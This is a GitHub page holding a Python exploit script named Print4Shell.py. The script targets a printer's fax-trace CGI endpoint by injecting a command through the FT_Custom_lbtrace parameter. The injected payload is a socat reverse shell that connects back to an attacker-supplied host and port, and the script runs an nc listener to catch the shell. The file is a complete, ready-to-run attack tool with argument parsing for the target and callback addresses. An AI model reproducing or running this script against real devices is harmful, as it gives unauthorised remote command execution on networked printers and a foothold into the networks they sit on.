-
Notifications
You must be signed in to change notification settings - Fork 5
/
Print4Shell.py
45 lines (33 loc) · 1.38 KB
/
Print4Shell.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
#!/usr/bin/python3
import argparse
import os
import requests
import threading
import time
import urllib.parse
def start_listener(lport):
print(f'[*] Starting listener on 0.0.0.0:{lport}...')
os.system(f'nc -l {lport}')
def send_payload(url, data):
time.sleep(2)
print(f'[*] Sending payload to server...')
requests.post(url, verify=False, data=data)
print('[*] Sent payload')
def exploit(target, callback_host, callback_port):
print(f'[*] Sending wakeup 1...')
requests.get(f'http://{target}/', verify=False)
print(f'[*] Sending wakeup 2...')
requests.get(f'http://{target}/', verify=False)
payload = f"socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:{callback_host}:{callback_port}"
url = f'http://{target}/cgi-bin/fax_change_faxtrace_settings'
data = f'FT_Custom_lbtrace=$({payload})'
t = threading.Thread(target=send_payload, args=(url,data), daemon=True)
t.start()
start_listener(callback_port)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('-r', '--rhost', help='The IP address of the target', required=True)
parser.add_argument('-l', '--lhost', help='The IP address of the listening post', required=True)
parser.add_argument('-p', '--lport', help='The port of the listening post', default=443)
args = parser.parse_args()
exploit(args.rhost, args.lhost, args.lport)